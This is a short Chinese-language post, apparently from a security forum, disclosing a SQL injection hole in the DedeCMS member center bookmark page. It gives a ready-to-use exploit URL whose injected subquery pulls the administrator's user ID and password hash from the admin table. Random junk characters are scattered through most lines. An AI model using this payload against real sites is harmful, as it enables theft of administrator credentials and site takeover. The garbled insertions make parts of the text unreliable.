DedeCMS会员中心SQL注射漏洞
* N4 ~' ~1 a, C4 {2 _4 k+ i! p7 d需要magic_quotes_gpc = Off5 Z8 e0 Z0 _1 X7 n5 W# f+ A3 ]
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.0 E$ U* a$ d" a; y9 b4 c
% X7 I, s# P% h! H
DedeCMS会员中心书签管理SQL注射漏洞 D! M" Q& a9 J" Y' N9 i
成功利用该漏洞可获得管理员密码
{5 N, t; v3 c% Y* @& y9 y ( @9 D% J' U' z+ ]- @6 Z& u1 w& s
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码8 }. b7 q4 A" X5 C
/ ~7 K: q2 e8 P, E* c# P$ H! ]! _) k7 W
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r1 s$ k0 F2 A8 D0 |
|